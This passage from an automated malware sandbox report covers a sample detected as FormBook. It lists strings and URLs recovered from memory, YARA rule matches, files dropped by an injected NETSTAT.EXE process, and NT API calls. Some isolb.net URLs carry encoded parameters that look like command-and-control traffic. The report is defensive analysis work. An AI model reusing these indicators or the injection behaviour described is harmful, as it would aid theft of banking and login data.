          Source: explorer.exe, 00000003.00000002.853654083.00000000033D0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: druS9vVaUK.exe, 00000000.00000002.448671243.0000000005372000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.482493233.000000000CCF6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.477127309.0000000007D97000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: druS9vVaUK.exe, 00000000.00000003.433122078.0000000005163000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comght?P
          Source: druS9vVaUK.exe, 00000000.00000002.448671243.0000000005372000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.482493233.000000000CCF6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: NETSTAT.EXE, 00000005.00000002.850897333.0000000000949000.00000004.00000001.sdmpString found in binary or memory: http://www.flycoz.com
          Source: NETSTAT.EXE, 00000005.00000002.850897333.0000000000949000.00000004.00000001.sdmpString found in binary or memory: http://www.flycoz.com/te/
          Source: druS9vVaUK.exe, 00000000.00000003.423851257.000000000517B000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.482493233.000000000CCF6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: druS9vVaUK.exe, 00000000.00000002.448671243.0000000005372000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.482493233.000000000CCF6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: druS9vVaUK.exe, 00000000.00000002.448671243.0000000005372000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.482493233.000000000CCF6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: druS9vVaUK.exe, 00000000.00000002.448671243.0000000005372000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.482493233.000000000CCF6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: druS9vVaUK.exe, 00000000.00000002.448671243.0000000005372000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.482493233.000000000CCF6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: NETSTAT.EXE, 00000005.00000002.848389605.0000000000233000.00000004.00000001.sdmpString found in binary or memory: http://www.google.ch/
          Source: NETSTAT.EXE, 00000005.00000002.848389605.0000000000233000.00000004.00000001.sdmpString found in binary or memory: http://www.google.ch/1
          Source: NETSTAT.EXE, 00000005.00000003.769957339.0000000000230000.00000004.00000001.sdmpString found in binary or memory: http://www.google.ch/1T?
          Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmpString found in binary or memory: http://www.isolb.net/Best_Penny_Stocks.cfm?fp=mk4biGGtTPOeRjpJ5Czof7fB3P0OahiLQhEqISnL291F44tz9cT0lf
          Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmpString found in binary or memory: http://www.isolb.net/Dental_Plans.cfm?fp=mk4biGGtTPOeRjpJ5Czof7fB3P0OahiLQhEqISnL291F44tz9cT0lfgLwW5
          Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmpString found in binary or memory: http://www.isolb.net/High_Speed_Internet.cfm?fp=mk4biGGtTPOeRjpJ5Czof7fB3P0OahiLQhEqISnL291F44tz9cT0
          Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmpString found in binary or memory: http://www.isolb.net/Top_Smart_Phones.cfm?fp=mk4biGGtTPOeRjpJ5Czof7fB3P0OahiLQhEqISnL291F44tz9cT0lfg
          Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmpString found in binary or memory: http://www.isolb.net/display.cfm
          Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmpString found in binary or memory: http://www.isolb.net/fashion_trends.cfm?fp=mk4biGGtTPOeRjpJ5Czof7fB3P0OahiLQhEqISnL291F44tz9cT0lfgLw
          Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmpString found in binary or memory: http://www.isolb.net/find_a_tutor.cfm?fp=mk4biGGtTPOeRjpJ5Czof7fB3P0OahiLQhEqISnL291F44tz9cT0lfgLwW5
          Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmpString found in binary or memory: http://www.isolb.net/music_videos.cfm?fp=mk4biGGtTPOeRjpJ5Czof7fB3P0OahiLQhEqISnL291F44tz9cT0lfgLwW5
          Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmpString found in binary or memory: http://www.isolb.net/px.js?ch=1
          Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmpString found in binary or memory: http://www.isolb.net/px.js?ch=2
          Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmpString found in binary or memory: http://www.isolb.net/sk-logabpstatus.php?a=SWR5WDVXc001eDhjT2U2MDZtMmFraXQrdXJWVGYvMUVGTGwvVkMzeWdwe
          Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmpString found in binary or memory: http://www.isolb.net/te/?1bm41T=mVrXCCC1UxiLkFcyo0UiEujr6Tcj2iygFeKfTYkHGEjYfWW5ml4nmy0cK0afZAsSueXT
          Source: druS9vVaUK.exe, 00000000.00000002.448671243.0000000005372000.00000004.00000001.sdmp, druS9vVaUK.exe, 00000000.00000003.433122078.0000000005163000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.482493233.000000000CCF6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: druS9vVaUK.exe, 00000000.00000003.433122078.0000000005163000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ET$
          Source: druS9vVaUK.exe, 00000000.00000003.433122078.0000000005163000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/NT
          Source: druS9vVaUK.exe, 00000000.00000003.433122078.0000000005163000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
          Source: druS9vVaUK.exe, 00000000.00000003.433122078.0000000005163000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/bT9
          Source: druS9vVaUK.exe, 00000000.00000003.433122078.0000000005163000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jT1
          Source: druS9vVaUK.exe, 00000000.00000003.433122078.0000000005163000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: druS9vVaUK.exe, 00000000.00000003.433122078.0000000005163000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/1T
          Source: druS9vVaUK.exe, 00000000.00000003.433122078.0000000005163000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/yT
          Source: druS9vVaUK.exe, 00000000.00000003.433122078.0000000005163000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/pTW
          Source: druS9vVaUK.exe, 00000000.00000003.433122078.0000000005163000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/r
          Source: NETSTAT.EXE, 00000005.00000002.848389605.0000000000233000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: NETSTAT.EXE, 00000005.00000002.848389605.0000000000233000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp141
          Source: NETSTAT.EXE, 00000005.00000003.769957339.0000000000230000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp4q
          Source: NETSTAT.EXE, 00000005.00000003.770046562.0000000000247000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehpLMEM
          Source: NETSTAT.EXE, 00000005.00000002.848389605.0000000000233000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpLMEMhx
          Source: NETSTAT.EXE, 00000005.00000002.848389605.0000000000233000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehps
          Source: NETSTAT.EXE, 00000005.00000002.848389605.0000000000233000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
          Source: NETSTAT.EXE, 00000005.00000002.848389605.0000000000233000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/ocid=iehp
          Source: druS9vVaUK.exe, 00000000.00000003.423851257.000000000517B000.00000004.00000001.sdmp, druS9vVaUK.exe, 00000000.00000002.448671243.0000000005372000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.482493233.000000000CCF6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: druS9vVaUK.exe, 00000000.00000003.423851257.000000000517B000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comn-u
          Source: druS9vVaUK.exe, 00000000.00000003.423851257.000000000517B000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comp
          Source: druS9vVaUK.exe, 00000000.00000003.423851257.000000000517B000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comr-c#
          Source: druS9vVaUK.exe, 00000000.00000002.448671243.0000000005372000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.482493233.000000000CCF6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: druS9vVaUK.exe, 00000000.00000002.448671243.0000000005372000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.482493233.000000000CCF6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.482493233.000000000CCF6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: druS9vVaUK.exe, 00000000.00000002.448671243.0000000005372000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.482493233.000000000CCF6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: druS9vVaUK.exe, 00000000.00000002.448671243.0000000005372000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.482493233.000000000CCF6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: NETSTAT.EXE, 00000005.00000002.848139902.0000000000224000.00000004.00000020.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
          Source: NETSTAT.EXE, 00000005.00000002.848389605.0000000000233000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1LMEM
          Source: NETSTAT.EXE, 00000005.00000002.848389605.0000000000233000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&http
          Source: NETSTAT.EXE, 00000005.00000003.770046562.0000000000247000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1LMEM
          Source: NETSTAT.EXE, 00000005.00000002.848139902.0000000000224000.00000004.00000020.sdmpString found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=722878611&size=306x271&https=1u
          Source: NETSTAT.EXE, 00000005.00000002.848139902.0000000000224000.00000004.00000020.sdmpString found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=858412214&size=306x271&https=1
          Source: NETSTAT.EXE, 00000005.00000002.852651338.0000000003278000.00000004.00000001.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?hl=en&origin=https%3A%2F%2Fwww.google.ch&pid=1&spid=1&prid=190
          Source: NETSTAT.EXE, 00000005.00000002.848389605.0000000000233000.00000004.00000001.sdmpString found in binary or memory: https://ogs.google.com/widget/callouthl=en&origin=https%3A%2F%2Fwww.google.ch&pid=1&spid=1&prid=1901
          Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmpString found in binary or memory: https://www.domain.com/controlpanel/domaincentral/3.0/
          Source: NETSTAT.EXE, 00000005.00000002.848389605.0000000000233000.00000004.00000001.sdmpString found in binary or memory: https://www.google.ch/?gws_rd=ssl
          Source: NETSTAT.EXE, 00000005.00000002.848389605.0000000000233000.00000004.00000001.sdmpString found in binary or memory: https://www.google.ch/?gws_rd=sslLMEMh
          Source: NETSTAT.EXE, 00000005.00000002.848389605.0000000000233000.00000004.00000001.sdmpString found in binary or memory: https://www.google.ch/?gws_rd=sslp
          Source: NETSTAT.EXE, 00000005.00000002.848389605.0000000000233000.00000004.00000001.sdmpString found in binary or memory: https://www.google.ch/favicon.ico
          Source: NETSTAT.EXE, 00000005.00000002.848389605.0000000000233000.00000004.00000001.sdmpString found in binary or memory: https://www.google.ch/gws_rd=ssl

          Source: druS9vVaUK.exe, 00000000.00000002.444726602.0000000000C90000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.847404146.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.501814607.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.501038766.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.852694551.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.499850983.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.453585348.0000000009125000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.druS9vVaUK.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.druS9vVaUK.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Detected FormBook malwareShow sources
          Source: C:\Windows\SysWOW64\NETSTAT.EXEDropped file: C:\Users\user\AppData\Roaming\940NNO9F\940logri.iniJump to dropped file
          Source: C:\Windows\SysWOW64\NETSTAT.EXEDropped file: C:\Users\user\AppData\Roaming\940NNO9F\940logrf.iniJump to dropped file
          Source: C:\Windows\SysWOW64\NETSTAT.EXEDropped file: C:\Users\user\AppData\Roaming\940NNO9F\940logrv.iniJump to dropped file
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000005.00000002.847404146.00000000001D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.847404146.00000000001D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.501814607.0000000000EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.501814607.0000000000EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.501038766.0000000000A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.501038766.0000000000A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.852694551.00000000032A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.852694551.00000000032A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.499850983.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.499850983.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.453585348.0000000009125000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.453585348.0000000009125000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.druS9vVaUK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.druS9vVaUK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.druS9vVaUK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.druS9vVaUK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess Stats: CPU usage > 98%
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00BCABCE NtQuerySystemInformation,0_2_00BCABCE
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00BCAA5E NtQueryInformationProcess,0_2_00BCAA5E
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00BCAB93 NtQuerySystemInformation,0_2_00BCAB93
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00BCAA3C NtQueryInformationProcess,0_2_00BCAA3C
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 2_2_00416BC0 NtCreateFile,2_2_00416BC0
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 2_2_00416C70 NtReadFile,2_2_00416C70
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 2_2_00416CF0 NtClose,2_2_00416CF0
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 2_2_00416DA0 NtAllocateVirtualMemory,2_2_00416DA0
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 2_2_00416BBA NtCreateFile,2_2_00416BBA
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 2_2_00416C12 NtReadFile,2_2_00416C12
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA350 NtQueryValueKey,LdrInitializeThunk,5_2_034BA350
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA360 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_034BA360
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA310 NtEnumerateValueKey,LdrInitializeThunk,5_2_034BA310
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA3D0 NtCreateKey,LdrInitializeThunk,5_2_034BA3D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA3E0 NtFreeVirtualMemory,LdrInitializeThunk,5_2_034BA3E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA240 NtReadFile,LdrInitializeThunk,5_2_034BA240
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA260 NtWriteFile,LdrInitializeThunk,5_2_034BA260
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA2D0 NtClose,LdrInitializeThunk,5_2_034BA2D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA800 NtSetValueKey,LdrInitializeThunk,5_2_034BA800
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA750 NtCreateFile,LdrInitializeThunk,5_2_034BA750
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA610 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_034BA610
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA6A0 NtCreateSection,LdrInitializeThunk,5_2_034BA6A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA540 NtDelayExecution,LdrInitializeThunk,5_2_034BA540
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA560 NtQuerySystemInformation,LdrInitializeThunk,5_2_034BA560
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA470 NtSetInformationFile,LdrInitializeThunk,5_2_034BA470
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA410 NtQueryInformationToken,LdrInitializeThunk,5_2_034BA410
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BACE0 NtCreateMutant,LdrInitializeThunk,5_2_034BACE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA480 NtMapViewOfSection,LdrInitializeThunk,5_2_034BA480
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA370 NtQueryInformationProcess,5_2_034BA370
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03479305 NtClose,NtClose,5_2_03479305
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034FA32E NtQueryInformationProcess,NtMapViewOfSection,NtClose,5_2_034FA32E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034A6B3E NtDelayExecution,5_2_034A6B3E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0347C330 NtQueryValueKey,NtQueryValueKey,5_2_0347C330
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034F63A6 NtWaitForSingleObject,NtClose,5_2_034F63A6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034F4BBE NtQuerySystemInformation,5_2_034F4BBE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_035343A4 NtAllocateVirtualMemory,5_2_035343A4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034AEA6E NtAllocateVirtualMemory,5_2_034AEA6E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03475275 NtClose,NtClose,NtClose,NtClose,5_2_03475275
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034FA27C NtQueryVirtualMemory,5_2_034FA27C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03479210 NtClose,NtClose,5_2_03479210
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034A6A2B NtFreeVirtualMemory,NtFreeVirtualMemory,5_2_034A6A2B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA220 NtWaitForSingleObject,5_2_034BA220
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034A523D NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtAllocateVirtualMemory,5_2_034A523D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BBA30 NtSetContextThread,5_2_034BBA30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03471AC0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,5_2_03471AC0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034A22C3 NtAllocateVirtualMemory,NtAllocateVirtualMemory,5_2_034A22C3
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0350B2C0 NtAdjustPrivilegesToken,NtAdjustPrivilegesToken,NtClose,NtClose,5_2_0350B2C0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0353F2C5 NtFreeVirtualMemory,5_2_0353F2C5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA2F0 NtQueryInformationFile,5_2_034BA2F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034F3284 NtQueryValueKey,NtQueryValueKey,5_2_034F3284
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0347EAA0 NtClose,5_2_0347EAA0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_035012B9 NtAllocateVirtualMemory,5_2_035012B9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034942B0 NtClose,5_2_034942B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0353F969 NtQueryVirtualMemory,5_2_0353F969
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034A7110 NtQueryInformationProcess,NtQueryInformationProcess,5_2_034A7110
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03488123 NtProtectVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,5_2_03488123
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0353A9DE NtFreeVirtualMemory,5_2_0353A9DE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034B51C6 NtQueryValueKey,NtClose,5_2_034B51C6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0353F1DD NtFreeVirtualMemory,5_2_0353F1DD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034751E0 NtClose,NtClose,NtClose,5_2_034751E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_035011AC NtWaitForSingleObject,NtClose,5_2_035011AC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03535053 NtProtectVirtualMemory,5_2_03535053
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034F7866 NtProtectVirtualMemory,5_2_034F7866
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0353E822 NtFreeVirtualMemory,5_2_0353E822
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034A48CB NtAllocateVirtualMemory,5_2_034A48CB
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034AC0D7 NtProtectVirtualMemory,5_2_034AC0D7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034870E9 NtMapViewOfSection,NtUnmapViewOfSection,5_2_034870E9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0352B89B NtAllocateVirtualMemory,5_2_0352B89B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_035408A5 NtQueryVirtualMemory,5_2_035408A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BB0B0 NtGetContextThread,5_2_034BB0B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0347A740 NtClose,NtClose,5_2_0347A740
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034F2F40 NtQueryValueKey,NtClose,5_2_034F2F40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03541746 NtFreeVirtualMemory,5_2_03541746
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03487F74 NtProtectVirtualMemory,NtProtectVirtualMemory,5_2_03487F74
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA700 NtProtectVirtualMemory,5_2_034BA700
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA710 NtQuerySection,5_2_034BA710
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0353DF39 NtQueryVirtualMemory,NtQueryVirtualMemory,5_2_0353DF39
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA720 NtResumeThread,5_2_034BA720
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0352F722 NtQueryInformationProcess,5_2_0352F722
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03501724 NtQueryInformationProcess,5_2_03501724
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0352B7FA NtAllocateVirtualMemory,5_2_0352B7FA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03487781 NtProtectVirtualMemory,5_2_03487781
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA780 NtOpenDirectoryObject,5_2_034BA780
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03495790 NtAllocateVirtualMemory,NtAllocateVirtualMemory,5_2_03495790
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03500FB0 NtQuerySystemInformation,NtClose,5_2_03500FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0353FFAC NtQueryVirtualMemory,5_2_0353FFAC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034ADE50 NtQueryInformationProcess,5_2_034ADE50
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA650 NtQueueApcThread,5_2_034BA650
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03523660 NtQueryVirtualMemory,5_2_03523660
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0350BE30 NtAdjustPrivilegesToken,NtClose,NtClose,5_2_0350BE30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034ACE34 NtClose,5_2_034ACE34
